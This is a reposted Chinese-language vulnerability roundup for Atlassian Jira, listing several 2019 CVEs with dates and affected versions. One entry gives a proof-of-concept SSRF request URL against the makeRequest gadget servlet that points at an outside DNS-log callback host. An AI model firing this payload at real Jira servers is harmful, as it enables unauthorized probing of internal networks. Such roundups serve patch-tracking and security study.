碼上歡樂
相關內容    簡體    繁體

應用安全 - 軟件漏洞 - Atlassian - Jira漏洞匯總

本文轉載自   查看原文   2019-10-12 14:08   457    應用安全 
CVE-2019-8451
Date
2019

類型
ssrf 

影響范圍

Jira < 8.4.0

 

復現

poc:

/plugins/servlet/gadgets/makeRequest?url=http://xxx.xxx.198.133:8080@xxx.dnslog.cn

CVE-2019-11581  
Date:2019.7
Jira未授權服務端模板注入遠程代碼執行漏洞

 

CVE-2019-15001 

Date:2019.10

Jira Importers Plugin模板注入漏洞

 

CVE-2019-14994

Date:
2019.10

類型:
Jira服務工作台路徑遍歷導致的敏感信息泄露漏洞

影響版本:
All versions before 3.9.16
3.10.x
3.11.x
3.12.x
3.13.x
3.14.x
3.15.x
3.16.x before 3.16.8 (the fixed version for 3.16.x)
4.0.x
4.1.x before 4.1.3 (the fixed version for 4.1.x)
4.2.x before 4.2.5 (the fixed version for 4.2.x)
4.3.x before 4.3.4 (the fixed version for 4.3.x)
4.4.0 before 4.4.1 (the fixed version for 4.4.x)


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



猜您在找 (CVE-2019-8449)Atlassian Jira 信息泄露漏洞復現 應用安全 - PHP - CMS - DeDeCMS - 漏洞 - 匯總 應用安全 - 平台 | 工具 - Nexus漏洞匯總 Atlassian JIRA服務器模板注入漏洞復現(CVE-2019-11581) 應用安全 - 中間件 - 解析漏洞 - 路徑遍歷 - 漏洞 - 匯總 Atlassian產品實踐[JIRA+Confluence+Crowd] Atlassian In Action-Jira之核心插件(三) 應用安全 - 工具 | 框架 - Apache - Apache Log4j - 漏洞 - 匯總 應用安全 – 端口漏洞整理 應用安全 - 端口漏洞整理
 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM